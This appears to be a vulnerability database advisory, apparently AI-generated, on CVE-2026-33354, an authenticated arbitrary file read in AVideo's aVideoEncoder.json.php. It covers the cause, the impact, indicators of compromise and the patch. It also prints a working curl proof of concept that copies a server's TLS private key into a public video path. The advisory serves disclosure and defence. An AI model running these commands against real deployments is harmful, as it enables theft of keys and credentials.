
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33354 is an authenticated arbitrary local file read vulnerability in WWBN AVideo, an open-source video platform. The flaw exists in the POST /objects/aVideoEncoder.json.php endpoint, which accepts a requester-controlled chunkFile parameter without properly restricting it to trusted server-generated paths. All versions up to and including 26.0 are affected. The vulnerability was published on March 19, 2026, with a patch commit available shortly after. It carries a CVSS v3.1 base score of 6.5 (High) per NVD, and 7.6 (High) per the GitHub Security Advisory (GitHub Advisory).
The root cause is CWE-73 (External Control of File Name or Path): the aVideoEncoder.json.php endpoint passes the attacker-supplied chunkFile parameter through the isValidURLOrPath() helper, which permits files under broad server directories including /var/www/, the application root, cache, tmp, and videos directories, only rejecting .php files. The endpoint then copies the specified local file into the attacker's public video storage path, making it downloadable over HTTP. Exploitation requires an authenticated account with upload permissions and at least one editable video record owned by the attacker; the target file must also be readable by the web application user. A proof-of-concept using curl commands was included in the security advisory, demonstrating exfiltration of TLS private keys (GitHub Advisory).
Successful exploitation allows an authenticated low-privileged user to read arbitrary local files accessible to the web server process, including TLS private keys, application configuration files, database credentials, and other sensitive data stored under /var/www/ and related directories. The exfiltrated files are copied into the attacker's public video storage and can be downloaded over plain HTTP without further authentication. While there is no direct integrity or availability impact, disclosure of TLS private keys or credentials could enable further attacks such as traffic decryption, credential reuse, or lateral movement within the infrastructure (GitHub Advisory).
A functional proof-of-concept exploit consisting of step-by-step curl commands is publicly available in the GitHub Security Advisory, confirmed to successfully read and exfiltrate local TLS private keys from a real AVideo deployment (GitHub Advisory). There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.041% (0.000410), indicating a currently low probability of widespread exploitation. Exploitation requires only a low-privileged authenticated account, making it accessible to any registered user with upload permissions.
curl -s -c attacker.cookies \
-d 'user=attacker&pass=UserPass123!' \
http://TARGET/objects/login.json.phpvideos_id and filename for the attacker's video record.printf 'x' > poc.mp4
curl -s -b attacker.cookies \
-F 'upl=@poc.mp4;type=video/mp4' \
http://TARGET/view/mini-upload-form/upload.php
# Note the returned videos_id (e.g., 4) and filename (e.g., poc_69bb86db62c308.68438735)chunkFile: Send a POST request to aVideoEncoder.json.php with the attacker's videos_id, an allowed format, and the target local file path as chunkFile.curl -s -b attacker.cookies \
-d 'videos_id=4&format=mp4&title=poc&description=test&chunkFile=/var/www/html/AVideo/.compose/letsencrypt/live/localhost/privkey.pem' \
http://TARGET/objects/aVideoEncoder.json.phpcurl -s http://TARGET/videos/poc_69bb86db62c308.68438735/poc_69bb86db62c308.68438735.mp4 | head
# Output begins with: -----BEGIN PRIVATE KEY-----/objects/aVideoEncoder.json.php containing a chunkFile parameter with absolute filesystem paths (e.g., /var/www/, /etc/, /home/) rather than expected chunk filenames; subsequent GET requests to /videos/<filename>/<filename>.mp4 immediately after such POST requests from the same source IP.aVideoEncoder.json.php with chunkFile values containing path separators (/) pointing to non-video directories; repeated access to the same video URL from the uploading account's session shortly after encoding requests..pem, .conf, .env, .key) appearing in the AVideo /videos/ storage directory with .mp4 extensions; file modification timestamps on video storage files that do not correspond to legitimate encoding activity.www-data) reading files outside the expected video upload directories, observable via audit logs or file access monitoring tools.The patch is available in commit 59bbd601a3f65a5b18c1d9e4eb11471c0a59214f in the WWBN/AVideo repository; users should update to any version newer than 26.0 (GitHub Advisory, Patch Commit). As a workaround prior to patching, restrict access to aVideoEncoder.json.php at the web server level (e.g., via .htaccess or nginx configuration) to trusted IP ranges only. Additionally, implement additional server-side validation to restrict the chunkFile parameter to only server-generated chunk paths within the designated upload/tmp directory. Review web server access logs for suspicious chunkFile parameter values as described in the IOCs section.
The vulnerability was reported by researcher gr00ve3 and published via the WWBN/AVideo GitHub Security Advisory on March 19, 2026 (GitHub Advisory). Brief community discussion was observed on Mastodon and Bluesky shortly after the CVE was published to NVD on March 23, 2026. A technical write-up was published at infinitsec.net covering the vulnerability mechanics. No major vendor statements or significant media coverage beyond standard vulnerability tracking databases have been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."